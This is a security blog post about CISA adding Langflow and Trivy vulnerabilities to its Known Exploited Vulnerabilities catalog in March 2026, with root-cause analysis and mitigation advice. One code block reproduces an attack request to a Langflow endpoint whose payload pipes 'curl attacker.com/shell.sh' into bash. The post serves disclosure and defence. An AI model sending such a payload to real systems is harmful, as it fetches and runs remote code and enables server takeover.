ai-security

Your AI Toolchain Is Under Attack: Langflow and Trivy Hit CISA KEV in the Same Week

Petru Constantin
6 min read
#ai-security#mlops#supply-chain#vulnerability-management

Your AI Toolchain Is Under Attack: Langflow and Trivy Hit CISA KEV in the Same Week

Two Tools, One Week, Zero Excuses

Between March 25 and March 26, 2026, CISA added two tools to its Known Exploited Vulnerabilities catalog that most AI teams use daily: Langflow, the visual framework for building AI pipelines, and Trivy, the container and artifact scanner that runs in virtually every CI/CD pipeline touching containers. Not the models. Not the training data. The tools you use to build and ship AI systems.

CVE-2026-33017 gave attackers unauthenticated remote code execution on any exposed Langflow instance. Exploitation started within 20 hours of disclosure. CVE-2026-33634 turned Trivy's official release infrastructure into a credential-stealing supply chain weapon after a threat actor called TeamPCP poisoned GitHub Actions, Docker Hub images, and release binaries simultaneously.

If your AI team runs Langflow for prototyping or Trivy for scanning, you had a window of about one day before attackers came knocking. That is the state of AI toolchain security in 2026.

Langflow: Same exec() Call, Twice

Here is the part that should worry you more than any single CVE: Langflow was hit through the same underlying pattern twice.

In May 2025, CVE-2025-3248 exploited Langflow's /api/v1/validate/code endpoint. The vulnerability? Python's exec() function running user-supplied code without authentication. CISA added it to KEV. Langflow patched it in version 1.3.0.

Ten months later, CVE-2026-33017 hit a different endpoint (/api/v1/build_public_tmp/{flow_id}/flow) with the same fundamental problem: attacker-controlled Python code executed server-side without sandboxing. CVSS 9.3. CISA KEV again.

And JFrog's security research team found that version 1.8.2, widely reported as patched, remains exploitable.

The pattern is clear: patching individual endpoints does not fix an architectural problem. When your application's core design involves executing arbitrary code from external input, every new feature creates a new attack surface. The fix for CVE-2025-3248 added authentication to one endpoint. It did not address the fact that the application's fundamental operation, building flows from user definitions, requires code execution.

# The pattern that keeps breaking Langflow:
# User-supplied flow data → AST parse → compile → exec()
# Authentication fixes one endpoint. The architecture stays vulnerable.
 
# What attackers sent to /api/v1/build_public_tmp/{flow_id}/flow:
{
  "nodes": [{
    "data": {
      "node": {
        "template": {
          "code": {
            "value": "__import__('os').system('curl attacker.com/shell.sh | bash')"
          }
        }
      }
    }
  }]
}

Trivy: Your Security Scanner Became the Threat

The Trivy compromise is a different kind of problem, and in some ways worse.

On March 19, 2026, TeamPCP force-pushed 76 of 77 version tags in aquasecurity/trivy-action to point at malicious commits. They published a trojaned Trivy v0.69.4 release. The payload ran before the legitimate scan, so pipelines looked normal while credentials were exfiltrated in the background.

The root cause? Credentials that were not fully revoked after a previous security incident. Aqua Security confirmed that earlier containment was incomplete, leaving residual access to release infrastructure.

Think about what Trivy has access to in a typical pipeline: cloud provider credentials, Kubernetes tokens, SSH keys, container registry auth, and every secret your CI/CD system touches. It runs on every PR, every merge, every deployment. Compromise the scanner, and you do not just get code. You get the keys to the entire infrastructure.

This was not theoretical. Kaspersky confirmed TeamPCP also targeted Checkmarx KICS and LiteLLM in the same campaign. Three developer tools, one coordinated operation.

Why This Matters Beyond Patching

Most security teams treat AI tools like any other software: patch when there is a CVE, move on. That approach fails here for three reasons.

First, AI tools have architectural risk. Langflow, by design, executes code that users provide. LiteLLM routes prompts across providers, meaning it handles credentials for every LLM API you use. These tools are not incidentally dangerous. Their core function requires elevated privileges and code execution.

Second, the attack surface grows with every integration. Each new MCP server, each new LangChain tool, each RAG pipeline connector adds another surface where untrusted input meets code execution. The OpenClaw crisis confirmed this: one in five packages in the ClawHub registry were malicious. AI agent ecosystems are repeating the npm/PyPI supply chain mistakes, but with tools that have far more access.

Third, your compliance obligations cover this. The EU AI Act Article 15 requires high-risk AI systems to be "resilient against attempts by unauthorised third parties to alter their use, outputs or performance by exploiting system vulnerabilities." A Langflow instance building your production AI pipeline that is exploitable via unauthenticated HTTP is not resilient. A Trivy scanner exfiltrating credentials from your deployment pipeline is not robust. These are not edge cases for compliance officers to dismiss. They are exactly the scenarios Article 15 was written to prevent.

What to Do About It This Week

If you run Langflow: upgrade to version 1.9.0 or later. Do not trust 1.8.2. Audit whether any Langflow instance is exposed to the internet without authentication. If it is, assume it was compromised and rotate any credentials it had access to.

If you run Trivy: pin to v0.69.3 or earlier. Check your trivy-action commit SHA against the known-good hashes. Rotate any secrets that were available to CI/CD pipelines between March 19 and March 26.

Beyond the immediate patches:

  1. Inventory your AI toolchain. List every tool in your AI development and deployment pipeline. Langflow, LangChain, LlamaIndex, vLLM, Trivy, whatever you use. Know what each tool has access to.
  2. Pin dependencies by hash, not tag. Mutable tags are what made the Trivy attack possible. Pin GitHub Actions by commit SHA. Pin container images by digest.
  3. Isolate AI dev tools from production secrets. Your prototyping environment should not have access to production credentials. Langflow instances for experimentation should run in sandboxed environments with no network egress.
  4. Monitor for unusual outbound traffic from CI/CD runners. The Trivy payload called home to exfiltrate credentials. Network monitoring on your build infrastructure would have caught this.

The Toolchain Is the New Perimeter

We spent years securing models against prompt injection and adversarial inputs. That work matters. But while we were focused on the model layer, attackers went after the infrastructure underneath: the tools that build, test, scan, and deploy AI systems.

Two CISA KEV entries in one week, both targeting AI development tools, is not a coincidence. It is a pattern. The next Langflow or Trivy is already in your pipeline. The question is whether you will find it before an attacker does.

If you are building AI systems in production and have not audited the security posture of your development tools, that is the first thing to fix. Not next quarter. This week.


About DeviDevs: We build ML platforms, secure AI systems, and help companies comply with the EU AI Act. devidevs.com

Need help with EU AI Act compliance or AI security?

Book a free 30-minute consultation. No commitment.

Book a Call

Weekly AI Security & Automation Digest

Get the latest on AI Security, workflow automation, secure integrations, and custom platform development delivered weekly.

No spam. Unsubscribe anytime.